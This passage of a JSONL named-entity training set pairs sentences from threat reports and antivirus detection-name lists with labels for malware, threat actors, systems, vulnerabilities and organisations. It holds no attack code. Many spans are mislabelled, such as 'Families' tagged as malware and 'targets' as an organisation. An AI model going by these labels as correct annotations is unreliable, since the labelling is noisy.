attack targeting Windows systems vulnerable to EternalBlue SMB exploit.", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "MALWARE: SambaCry": [[38, 46]], "MALWARE: WannaCry": [[64, 72]], "SYSTEM: Windows systems": [[90, 105]], "VULNERABILITY: vulnerable": [[106, 116]], "MALWARE: EternalBlue SMB exploit.": [[120, 144]]}, "info": {"id": "cyner2_train_003592", "source": "cyner2_train"}} {"text": "Families like Poweliks, which abuse Microsoft's PowerShell, have emerged in recent years and have garnered extensive attention due to their ability to compromise a system while leaving little or no trace of their presence to traditional forensic techniques.", "spans": {"MALWARE: Families": [[0, 8]], "MALWARE: Poweliks,": [[14, 23]], "VULNERABILITY: abuse Microsoft's PowerShell,": [[30, 59]], "VULNERABILITY: compromise": [[151, 161]], "SYSTEM: system": [[164, 170]]}, "info": {"id": "cyner2_train_003593", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VBS.Shutdown TrojanDownloader:Win32/Tembatch.A Trojan.Jacard.D636D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003594", "source": "cyner2_train"}} {"text": "The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity.", "spans": {"SYSTEM: actor-controlled infrastructure,": [[45, 77]], "MALWARE: payloads,": [[105, 114]]}, "info": {"id": "cyner2_train_003595", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Proxy.Small.E Trojan-Proxy/W32.Small.4096.C TrojanProxy.Small Trojan/Proxy.Small.e Win32.Trojan.WisdomEyes.16070401.9500.9933 Win32/Slarp.B BKDR_SALAR.A Win.Trojan.Proxy-3663 Trojan.Proxy.Small.E Trojan-Proxy.Win32.Small.e Trojan.Proxy.Small.E Trojan.Win32.Small.dosc Troj.Proxy.W32.Small.e!c Win32.Trojan-proxy.Small.Ozsg Trojan.Proxy.Small.E Trojan.Proxy.Small.E Trojan.Proxy.1698 Trojan.Small.Win32.2849 BKDR_SALAR.A 
W32/Risk.RVLO-8598 TrojanProxy.Small.aeu Win32.Troj.Small.e.kcloud Trojan.Proxy.Small.E Trojan-Proxy.Win32.Small.e TrojanProxy:Win32/Small.E Trojan.Proxy.Small.E BScope.Trojan.Jackz.a Win32/TrojanProxy.Small.NEQ Trojan.PR.Small!jIc3Mh2dhO0 W32/Bdoor.A!tr.bdr Bck/Salar.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003598", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M/Downloader.cew Trojan.Phisherly TROJ_PHISHERLY.ZQEJ-A TROJ_PHISHERLY.ZQEJ-A W97M/Downloader.cew ZIP/Trojan.YBQC-0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003600", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DumtoxXAX.Trojan Worm.Win32.VB!O Trojan.Comisproc.AZ3 Trojan.VB.Win32.56251 Trojan/VB.peu Trojan.Heur.EE2DE0 WORM_VOBFUS.NER Win32.Trojan.VB.je WORM_VOBFUS.NER Worm.Win32.VB.fer Trojan.Win32.VB.epyowu BehavesLike.Win32.VBObfus.cz Worm.Win32.VB Worm/VB.pcc Worm/Win32.VB.fer Worm.Win32.A.VB.176128.AR Worm.Win32.VB.fer Worm/Win32.AutoRun.R49416 W32/Autorun.worm.aacy TScope.Trojan.VB Win32/VB.PEU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003601", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Racvacs.AA2 Trojan.Cosmu.Win32.3454 Trojan/Scar.atyl Win32.Trojan.IRCBot.b Win32/IRCBot.JZK TROJ_PAM_000001074B.T3 Trojan.Win32.MLW.stwkl Troj.W32.Cosmu.ldLk Worm.Win32.Autorun.lbe Win32.HLLW.Autoruner1.11201 BehavesLike.Win32.Downloader.lm Trojan/Scar.bqi Worm:Win32/Ircbot.D Trojan/Win32.Unknown Win32.Troj.Undef.kcloud Worm:Win32/IRCbot.D Worm/Win32.AutoRun.R2912 W32/Autorun.worm.bbx BScope.Trojan-Spy.Zbot Trojan.Win32.Cosmu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003602", "source": "cyner2_train"}} {"text": "The owners of Trojans such as Leech, Ztorg, Gorpo as well as the new malware family Trojan.AndroidOS.Iop are working together.", "spans": {"THREAT_ACTOR: The owners": [[0, 10]], "MALWARE: Trojans": [[14, 21]], 
"MALWARE: Leech, Ztorg, Gorpo": [[30, 49]], "MALWARE: malware family Trojan.AndroidOS.Iop": [[69, 104]]}, "info": {"id": "cyner2_train_003607", "source": "cyner2_train"}} {"text": "However, there is much information confused together, as if an entirely new IoT bot is spreading to and from Windows devices.", "spans": {"MALWARE: IoT bot": [[76, 83]], "SYSTEM: Windows devices.": [[109, 125]]}, "info": {"id": "cyner2_train_003608", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Nadostarch Trojan:Win32/Nadostarch.A Trojan.Win32.Nadostarch", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003609", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.HLLW.Autoruner.6669 Worm:Win32/Mofeir.P", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003612", "source": "cyner2_train"}} {"text": "To make the fake report appear even more scary, the malware displays your IP address and a picture of you.", "spans": {"MALWARE: malware": [[52, 59]]}, "info": {"id": "cyner2_train_003614", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Email-Worm.Zhelatin.pk W32/Zhelatin.pk Trojan.Win32.Zhelatin.mqtc Trojan.Peacomm Tibs.BFZS Win32/Sintun.AV TROJ_NUWAR.UP Trojan.Zhelatin Email-Worm.Win32.Zhelatin.pk I-Worm.Win32.Zhelatin.142336 EmailWorm.Win32.Zhelatin.pk0 Trojan.Spambot.2386 TROJ_NUWAR.UP Worm.Zhelatin.pk.kcloud Backdoor:Win32/Nuwar.A Worm/Win32.Zhelatin BScope.Zhelatin.con Trojan.Peacomm!rem Virus.Win32.Zhelatin W32/Tibs.G@mm I-Worm/Nuwar.N Trj/Spammer.AFG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003616", "source": "cyner2_train"}} {"text": "Cerber has previously been seen distributed via exploit kits and over e-mail using DOC files with macros.", "spans": {"MALWARE: Cerber": [[0, 6]], "MALWARE: exploit kits": [[48, 60]]}, "info": {"id": "cyner2_train_003622", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.4252 
Backdoor.Hupigon.148473 Backdoor.Hupigon.148473 Backdoor.Hupigon.D243F9 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Hupigon.148473 Backdoor.Hupigon.148473 Backdoor.Hupigon.148473 BackDoor.Pigeon1.3852 Win32.Hack.Huigezi.n.kcloud Backdoor:Win32/Tenpeq.C Backdoor.Hupigon.148473 MalwareScope.Trojan-PSW.Game.16 Trojan.Hupigon!iPBnzuR7b40 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003623", "source": "cyner2_train"}} {"text": "Since then, several examples of malware created by Animal Farm have been found and publicly documented, in particular:", "spans": {"MALWARE: malware": [[32, 39]], "THREAT_ACTOR: Animal Farm": [[51, 62]]}, "info": {"id": "cyner2_train_003624", "source": "cyner2_train"}} {"text": "He most probably did so to restore his reputation on a number of hacker forums: earlier, he had been promoting his development so aggressively and behaving so erratically that he was eventually suspected of being a scammer.", "spans": {"THREAT_ACTOR: number of hacker forums:": [[55, 79]], "THREAT_ACTOR: scammer.": [[215, 223]]}, "info": {"id": "cyner2_train_003626", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.Ngrbot!O Worm.Ngrbot Trojan.Zbot.Win32.51206 Trojan/Spy.Zbot.dcar Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/Trojan.IPQV-8835 Win.Trojan.Zbot-52317 Worm.Win32.Ngrbot.kie Troj.W32.Qhost.lkwM BehavesLike.Win32.ZBot.dc Trojan-Dropper.Win32.VB Worm/Win32.Ngrbot Worm.Win32.Ngrbot.kie Worm/Win32.Ngrbot.R62747 Worm.Ngrbot Trojan.Zbot TrojanSpy.Zbot!FbLT0Cb2klI W32/VBInjector.W!tr Win32/Trojan.BO.255", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003630", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.Adload.tml Trojan.Buzy.D8FA TSPY_DOWNLOADER_CD1002E2.RDXN Win32.Trojan.WisdomEyes.16070401.9500.9973 TROJ_PAM_0000010534.T3 Win.Trojan.Adload-3700 Trojan.Win32.Snojan.ccxx Trojan.Win32.Adload.cpqwy 
TrojWare.Win32.TrojanDownloader.Adload.tmm Trojan.DownLoader1.22512 BehavesLike.Win32.Backdoor.rc Trojan-Downloader.Win32.Adload TrojanDownloader.Adload.naf TrojanDownloader:Win32/Neup.A Trojan.Win32.Snojan.ccxx Downloader/Win32.Adload.R11798 PUP.Optional.Funshion Win32.Trojan.Adclicker.Sxoq Trojan.DL.Adload.MGR Win32/Trojan.56c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003635", "source": "cyner2_train"}} {"text": "Several months ago, we discovered and exposed RETADUP malware in Israeli hospitals.", "spans": {"MALWARE: RETADUP malware": [[46, 61]], "ORGANIZATION: Israeli hospitals.": [[65, 83]]}, "info": {"id": "cyner2_train_003637", "source": "cyner2_train"}} {"text": "This malicious program attacks only Raspberry Pi minicomputers.", "spans": {"MALWARE: malicious": [[5, 14]], "SYSTEM: Raspberry Pi minicomputers.": [[36, 63]]}, "info": {"id": "cyner2_train_003639", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Clicker.Win32.VB!O Win32/Adclicker.DSU Trojan-Clicker.Win32.VB.isz Trojan.Win32.VB.bcvse Trojan.Click1.25507 BehavesLike.Win32.Dropper.qt Trojan.Crypt TrojanClicker.VB.kho Trojan.Heur.ZGY.5 W32.W.Hawawi.lmFq Trojan-Clicker.Win32.VB.isz TrojanClicker:Win32/Refpron.A Trojan/Win32.Xema.R155513", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003640", "source": "cyner2_train"}} {"text": "In some samples analyzed by CTU researchers, the attachment was an obfuscated VBScript .vbs file that downloads and installs AdWind, or the email message just included a link to download and install the malware.", "spans": {"ORGANIZATION: CTU researchers,": [[28, 44]], "MALWARE: AdWind,": [[125, 132]]}, "info": {"id": "cyner2_train_003642", "source": "cyner2_train"}} {"text": "It's these same teens that are causing a surge in mobile ransomware in the Chinese underground market.", "spans": {"THREAT_ACTOR: teens": [[16, 21]], "SYSTEM: mobile": [[50, 56]], "MALWARE: ransomware": [[57, 67]], 
"THREAT_ACTOR: Chinese underground market.": [[75, 102]]}, "info": {"id": "cyner2_train_003643", "source": "cyner2_train"}} {"text": "In 2017 and 2018, ITG03 actors stole over $534 million from cryptocurrency exchange attacks, according to security firm Group IB.", "spans": {"THREAT_ACTOR: ITG03 actors": [[18, 30]], "ORGANIZATION: security firm Group IB.": [[106, 129]]}, "info": {"id": "cyner2_train_003647", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Hacktool.Bendor.C Trojan/W32.HackTool.20480.O Hacktool.Bendor Trojan.Hacktool.Bendor.C Tool.Bendor.Win32.1 Trojan/Hacktool.Bendor Trojan.Hacktool.Bendor.C BKDR_BANDOR.A Win32.Trojan.WisdomEyes.16070401.9500.9602 W32/Trojan.VSQ BKDR_BANDOR.A Trojan.Hacktool.Bendor.C HackTool.Win32.Bendor Trojan.Hacktool.Bendor.C Riskware.Win32.Bendor.hrie HackTool.Bendor.20480 HackTool.W32.Bendor!c Trojan.Hacktool.Bendor.C TrojWare.Win32.HackTool.Bendor.A Trojan.Hacktool.Bendor.C W32/Trojan.ULWX-3793 HackTool/Bendor.a W32.Hack.Tool HackTool/Win32.Bendor HackTool.Win32.Bendor Trj/Legmir.AJQ Win32/HackTool.Bendor.A Win32.Hacktool.Bendor.Lkdj HackTool.Bendor!+3jB7Bxnt10 Malware_fam.gw Win32/Trojan.Hacktool.5e9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003650", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Graftor.eruomq Trojan.Proxy2.754 Trojan.Proxy.1 Trj/GdSda.A Win32/Trojan.2c0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003651", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9723 Trojan.MSIL.Krypt.2 Trojan:MSIL/Remdobe.C TrojanDropper.FrauDrop Trj/CI.A Trojan.Win32.Jorik Win32/Trojan.7c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003653", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32.Trojan.WisdomEyes.16070401.9500.9876 Trojan.DownLoader.22765 BehavesLike.Win32.PWSZbot.mc 
Backdoor.Win32.Rbot TrojanDownloader:Win32/Wudoo.A Win32/Adware.Toolbar.Baidu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003654", "source": "cyner2_train"}} {"text": "This remote access toolkit has been publicly examined multiple times by the threat intelligence community.", "spans": {"MALWARE: remote access toolkit": [[5, 26]], "ORGANIZATION: threat intelligence community.": [[76, 106]]}, "info": {"id": "cyner2_train_003658", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MulDrop5.13033 HackTool.MSIL.ccp W32.Hack.Tool HackTool.Win32.AutoKMS Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003659", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.BaragoneE.Trojan Trojan.Win32.Cosmu!O Trojan.Cosmu.Win32.14181 TROJ_COSMU.SMJ0 Win32/Cosmu.OP TROJ_COSMU.SMJ0 Win.Trojan.Mybot-8550 Trojan.Win32.Bot.ercyne TrojWare.Win32.Phishbank.DA Trojan.Click1.57939 BehavesLike.Win32.Downloader.ch Trojan/Win32.Cosmu.awlb Trojan:Win32/Phishbank.A W32.W.Mydoom.kZJ8 TScope.Malware-Cryptor.SB Trojan.Win32.Sisron Trojan.Win32.Phishbank.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003661", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware03 AdWare.W32.Gamevance.m6Qo Trojan/Downloader.Stantinko.n Win32.Trojan.Xpack.a Win32.Trojan-Downloader.Stantinko.A TrojWare.Win32.TrojanDownloader.Stantinko.D BehavesLike.Win32.Downloader.ch Trojan.Graftor Trojan:Win32/Fiya.E Win32/TrojanDownloader.Stantinko.N W32/Stantinko.S!tr.dldr Win32/Trojan.Stantinko.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003662", "source": "cyner2_train"}} {"text": "The only difference is the malware payload being dropped, which is current and had very low detection on VirusTotal.", "spans": {"MALWARE: malware payload": [[27, 42]], "ORGANIZATION: VirusTotal.": [[105, 116]]}, "info": {"id": "cyner2_train_003663", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Trojan.VBMailSpam.B Trojan/W32.Flooder.577024.B Trojan/Delf.a TROJ_SPAMMER.A W32/Worm.FSFK-2238 Hacktool.Spammer Win32/Spadelf.C TROJ_SPAMMER.A Trojan.VBMailSpam.B Email-Flooder.Win32.Delf.a Trojan.VBMailSpam.B Trojan.Win32.Delf.ifpg Spyware.Email-Flooder.Delf.577024 Email-Flooder.W32.Delf.a!c Trojan.VBMailSpam.B TrojWare.Win32.Flooder.MailSpam.A Trojan.VBMailSpam.B Flooder.Mailbomb.6 Tool.Delf.Win32.442 W32/Worm.FVM Flooder.MailSpam.Delvs TR/VBMailSpam.B.1 HackTool[Flooder]/Win32.Delf Win32.Hack.Delf.a.kcloud Trojan.VBMailSpam.B Email-Flooder.Win32.Delf.a Spammer:Win32/Delf.A Trojan.VBMailSpam.B EmailFlooder.Delf Win32/Flooder.MailSpam.Delf.A Flooder.Delf!YEHm2HeU39s Trojan.Win32.Flooder Malware_fam.gw Win32/Trojan.fd6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003665", "source": "cyner2_train"}} {"text": "This includes detailed technical analysis of the Prikormka malware family and its spreading mechanisms, and a description of the most noteworthy attack campaigns.", "spans": {"MALWARE: Prikormka malware family": [[49, 73]], "THREAT_ACTOR: attack campaigns.": [[145, 162]]}, "info": {"id": "cyner2_train_003666", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Win32!O Win32.Trojan.WisdomEyes.16070401.9500.9867 Win.Tool.Hotfreezer-2 Trojan.Win32.Refroso.csjta TrojWare.Win32.HackTool.Homac Tool.Homac BehavesLike.Win32.Mydoom.pz Trojan/Refroso.ulh Trojan[Backdoor]/Win32.Shark HackTool:Win32/Homac.A HackTool.Homac Win32/HackTool.Homac Hacktool.Homac.A HackTool.Win32.Homac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003667", "source": "cyner2_train"}} {"text": "Hancitor is a popular dropper used in phishing campaigns.", "spans": {"MALWARE: Hancitor": [[0, 8]], "MALWARE: dropper": [[22, 29]], "THREAT_ACTOR: phishing campaigns.": [[38, 57]]}, "info": {"id": "cyner2_train_003669", "source": "cyner2_train"}} {"text": "A reputable, 
high-profile ad network provides traffers with access to higher-quality traffic, and the more reputable an ad network appears, the easier it is for traffers to reach this target traffic.", "spans": {"ORGANIZATION: high-profile ad network": [[13, 36]], "ORGANIZATION: ad network": [[120, 130]]}, "info": {"id": "cyner2_train_003670", "source": "cyner2_train"}} {"text": "In other cases, spear phish directs users to websites that would otherwise be trusted but actually have been compromised by threat actors seeking greater access to fulfill their actions and objectives.", "spans": {"THREAT_ACTOR: threat actors": [[124, 137]]}, "info": {"id": "cyner2_train_003671", "source": "cyner2_train"}} {"text": "Cybercriminals are using local brand names such as local ISP providers and legitimate looking addresses to fool users into downloading malware that can steal information by monitoring browsers, file transfer protocol FTP clients, and mail clients.", "spans": {"THREAT_ACTOR: Cybercriminals": [[0, 14]], "VULNERABILITY: local": [[25, 30]], "MALWARE: malware": [[135, 142]]}, "info": {"id": "cyner2_train_003672", "source": "cyner2_train"}} {"text": "Unit 42 has been tracking a new Remote Access Trojan RAT being sold for $40 USD since April 2016, known as Orcus", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Remote Access Trojan RAT": [[32, 56]], "MALWARE: Orcus": [[107, 112]]}, "info": {"id": "cyner2_train_003673", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Scar.15360.P Trojan.Win32.Scar!O Win32.Trojan.WisdomEyes.16070401.9500.9973 W32/Trojan.WBMR-2019 Win.Trojan.Merong-1 Trojan.Win32.Scar.dcrm Trojan.Win32.Scar.chxtv Trojan.Win32.A.Scar.15360 Troj.W32.Scar.dcrm!c Trojan.DownLoader5.8015 Trojan.Scar.Win32.48783 Trojan.Win32.Scar W32/Trojan3.YUH W32.Trojan.Scar Trojan/Win32.Scar Trojan.Win32.Scar.dcrm Trojan:Win32/Sluegot.A Trojan/Win32.Scar.R81257 Trojan.Scar Win32.Trojan.Scar.bove Trojan.Scar!69cHD7mX3A8 W32/Scar.DCM!tr.dldr 
Win32/Trojan.17a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003677", "source": "cyner2_train"}} {"text": "Indicators related to the CryptFile2 ransomware", "spans": {"MALWARE: CryptFile2 ransomware": [[26, 47]]}, "info": {"id": "cyner2_train_003680", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Proxy/W32.Thunker.14848.B Trojan/Proxy.Thunker.a TROJ_THUNKER.A Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Espy.OUZC-2697 Backdoor.Thunker Win32/Knooth.C TROJ_THUNKER.A Trojan-Proxy.Win32.Thunker.a Trojan.Win32.Thunker.gtlj Trojan.Win32.Proxy.14848.F Troj.Proxy.W32.Thunker.a!c TrojWare.Win32.TrojanProxy.Thunker.B Trojan.Thunker Trojan.Thunker.Win32.5 Trojan-Proxy.Win32.Thunker W32/Espy.A TrojanProxy.Thunker.b TR/Thunker.DLL Trojan[Proxy]/Win32.Thunker Win32.Troj.Thunker.a.kcloud Trojan-Proxy.Win32.Thunker.a Win32/TrojanProxy.Thunker.B Win32.Trojan-proxy.Thunker.Ajlv Trojan.Thunker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003683", "source": "cyner2_train"}} {"text": "Qianxin dissects a new malicious campaign by the SideCopy APT group.", "spans": {"ORGANIZATION: Qianxin": [[0, 7]], "THREAT_ACTOR: new malicious campaign": [[19, 41]], "THREAT_ACTOR: the SideCopy APT group.": [[45, 68]]}, "info": {"id": "cyner2_train_003684", "source": "cyner2_train"}} {"text": "Suspect You ’ re Infected ? 
The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo ’ s kill switch by sending the string “ 4 ” encrypted with the generated RSA public key and base64 encoded .", "spans": {"MALWARE: TrickMo": [[285, 292]]}, "info": {"id": "cyner2_train_003686", "source": "cyner2_train"}} {"text": "Email is one of the favorite methods used by attackers to infect systems.", "spans": {"THREAT_ACTOR: attackers": [[45, 54]], "SYSTEM: infect systems.": [[58, 73]]}, "info": {"id": "cyner2_train_003689", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Strictor.D22A4D W32/Trojan.ZZSK-0144 Win.Exploit.Fnstenv_mov-1 BehavesLike.Win32.Multiplug.wc Backdoor/Win32.Wingbird.R209335 W32/Injector.DNRG!tr Trj/GdSda.A Win32/Trojan.Spy.c28", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003691", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.ForShare.WmiBit Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Trojan.DownLoader24.53357 Trojan/Win32.PcClient.R191990 Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003692", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.VB!O Worm.VB Worm.VB.Win32.2956 W32/VB.bhj Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_PSVR_0000001.TOMA Win.Worm.VB-71919 Worm.Win32.VB.bhj Trojan.Win32.VB.dxohtw BackDoor.Poison.686 BKDR_PSVR_0000001.TOMA Trojan-Dropper.Vb Trojan.Razy.D3A7C4 Worm.Win32.A.VB.168516 Worm.Win32.VB.bhj Worm/Win32.VB.C142786 W32/VBKrypt.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003693", "source": "cyner2_train"}} {"text": "The domain was registered on August 4, 2015, under a presumably false name, and we suspect that the attack started on the same day.", 
"spans": {}, "info": {"id": "cyner2_train_003694", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TrosdanpomLTAA.Trojan Backdoor.Laserv.B Backdoor.Win32.Laserv!O Backdoor.Laserv.A4 Backdoor/Laserv.b W32/Backdoor.NWE Backdoor.Lassrv.B Win32/Lassrv.B BKDR_LASSRV.B Win.Trojan.Laserv-1 Backdoor.Laserv.B Backdoor.Win32.Laserv.b Backdoor.Laserv.B Trojan.Win32.Laserv.csyvps Trojan.Win32.Equation.132608 Backdoor.Laserv.B Backdoor.Laserv.B Backdoor.Laserv.Win32.8 BKDR_LASSRV.B BehavesLike.Win32.Downloader.ch W32/Backdoor.ZYMS-3992 BDS/Laserv.B.2 Trojan[Backdoor]/Win32.Laserv Backdoor.Laserv.B Backdoor.W32.Laserv!c Backdoor.Win32.Laserv.b Backdoor:Win32/Salsnit.A Win-Trojan/Equation.132623 Backdoor.Laserv.B Trojan.EquationLaser Win32.Backdoor.Laserv.Dvzs Backdoor.Laserv!QkthHIoGFGU Backdoor.Win32.Laserv W32/Laserv.C!tr Win32/Backdoor.21d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003695", "source": "cyner2_train"}} {"text": "This group has evolved a lot in sophistication and evasion techniques to defeat detection by security products.", "spans": {}, "info": {"id": "cyner2_train_003696", "source": "cyner2_train"}} {"text": "The choice of a lesser known currency with a good exchange rate allows the attackers to rapidly gain money while the sophisticated use of safeguards makes it resilient to most disruption attempts, potentially leaving victims infected for years.", "spans": {}, "info": {"id": "cyner2_train_003697", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dembr Trojan.MBR.Killer Trojan/KillDisk.nas TROJ_KILLMBR.SM Win32.Trojan.WisdomEyes.16070401.9500.9964 W32/Jokra.DWCJ-4354 Trojan.Jokra Win32/Tnega.ASFM TROJ_KILLMBR.SM Trojan.Win32.EraseMBR.b Trojan.Win32.EraseMBR.cqzdgw Trojan.Win32.S.KillMBR.24576 Troj.W32.EraseMBR.b!c Trojan.KillFiles.10563 Trojan.EraseMBR.Win32.4 W32/Jokra.A Trojan/EraseMBR.h TR/KillMBR.Y.2 Trojan/Win32.EraseMBR Trojan.Win32.EraseMBR.b Trojan:Win32/Dembr.A 
Trojan.KillDisk.MBR OScope.Trojan.KillMBR.2113 Trojan.KillDisk.NAS Win32/KillDisk.NAS Trojan.Win32.DataWiper.b Trojan.EraseMBR!+80n0qBNT48 Trojan.Win32.EraseMBR W32/Kast.A!tr Win32/Trojan.c81", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003700", "source": "cyner2_train"}} {"text": "What makes the Turla group special is not just the complexity of its tools, which include the Uroboros rootkit, aka Snake as well as mechanisms designed to bypass air gaps through multi-stage proxy networks inside LANs, but the exquisite satellite-based C C mechanism used in the latter stages of the attack.", "spans": {"THREAT_ACTOR: group": [[21, 26]], "MALWARE: tools,": [[69, 75]], "MALWARE: Uroboros rootkit,": [[94, 111]], "MALWARE: Snake": [[116, 121]], "SYSTEM: LANs,": [[214, 219]]}, "info": {"id": "cyner2_train_003701", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Trojan.WisdomEyes.16070401.9500.9647 Heur.Corrupt.PE Trojan.MulDrop3.4445 TrojanDownloader:Win32/Cordmix.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003702", "source": "cyner2_train"}} {"text": "To achieve persistence, the malware creates a Run key Registry entry on the system.", "spans": {"MALWARE: malware": [[28, 35]], "SYSTEM: system.": [[76, 83]]}, "info": {"id": "cyner2_train_003705", "source": "cyner2_train"}} {"text": "This industry initiative was created to share information and potentially disrupt the infrastructure and tools from an actor named the Lazarus Group.", "spans": {"ORGANIZATION: industry": [[5, 13]], "SYSTEM: infrastructure": [[86, 100]], "MALWARE: tools": [[105, 110]], "THREAT_ACTOR: actor": [[119, 124]], "THREAT_ACTOR: Lazarus Group.": [[135, 149]]}, "info": {"id": "cyner2_train_003707", "source": "cyner2_train"}} {"text": "Primarily targets South Korea.", "spans": {"ORGANIZATION: targets": [[10, 17]]}, "info": {"id": "cyner2_train_003709", "source": "cyner2_train"}} {"text": "A backdoor also 
known as: Trojan/W32.Inject.79360.B Trojan.Jinto Trojan/Inject.nzs Trojan.Heur.TP.EDF4BE Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.IJVQ TROJ_INJECT.AQT Trojan.Win32.Inject.79360 Troj.W32.Inject.nzs!c TrojWare.Win32.Inject.nzs Win32.HLLW.Recycler.8 Trojan.Inject.Win32.2004 TROJ_INJECT.AQT BehavesLike.Win32.PWSZbot.lh W32/Trojan.PLGK-4123 Trojan/Inject.dyx Win32.Troj.Inject.kcloud Trojan:WinNT/Jinto.A BScope.P2P-Worm.Palevo Trojan.Win32.Tdss Win32/Trojan.c68", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003710", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.NSIS.FraudLoad.hd BackDoor.RMS.111 BehavesLike.Win32.Dropper.vc W32/Trojan.KGYI-2902 TR/RedCap.ntnqc Backdoor:Win32/Kitpolap.A Trojan-Downloader.NSIS.FraudLoad.hd Trojan/Win32.Downloader.C2123311 Trj/CI.A NSIS/Radmin.B Win32.Trojan.Ratenjay.Umsg Riskware.RemoteAdmin!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003712", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware00 Backdoor.Sharat TROJ_TROXEN.CHU Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_TROXEN.CHU Win.Trojan.Downbot-3 Trojan.DownLoader5.18587 Trojan.Heur.RP.EA89AF Downloader/Win32.Small.R1708 Win32/Sharat.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003717", "source": "cyner2_train"}} {"text": "Talos has found a new SPAM campaign that is using multiple layers of obfuscation to attempt to evade detection.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: SPAM campaign": 